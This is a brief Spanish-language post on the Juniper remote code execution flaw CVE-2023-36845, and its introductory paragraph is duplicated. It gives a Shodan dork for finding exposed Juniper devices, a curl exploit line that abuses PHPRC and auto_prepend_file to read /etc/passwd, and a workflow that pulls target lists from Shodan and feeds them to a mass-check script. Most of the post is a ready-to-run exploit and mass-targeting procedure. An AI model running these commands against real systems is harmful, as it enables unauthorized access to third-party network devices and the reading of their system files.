
Juniper RCE (Remote Code Execution) CVE-2023-36845 es una vulnerabilidad que ha sido identificada dentro del software de Juniper. Esta falla en particular permite la ejecución remota de código, lo que significa que un atacante podría ejecutar código arbitrario en un sistema sin necesidad de acceso físico al dispositivo.
Juniper RCE (Ejecución Remota de Código) CVE-2023-36845 es una vulnerabilidad que ha sido identificada en el software de Juniper. Esta falla en particular permite la ejecución remota de código, lo que significa que un atacante podría ejecutar código arbitrario en un sistema sin necesidad de acceso físico al dispositivo.
Dork de Shodan: http.favicon.hash:2141724739
Úsalo con otros dorks relevantes, como certificados SSL, nombre de la organización, etc., para una búsqueda más específica.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #descargar desde shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
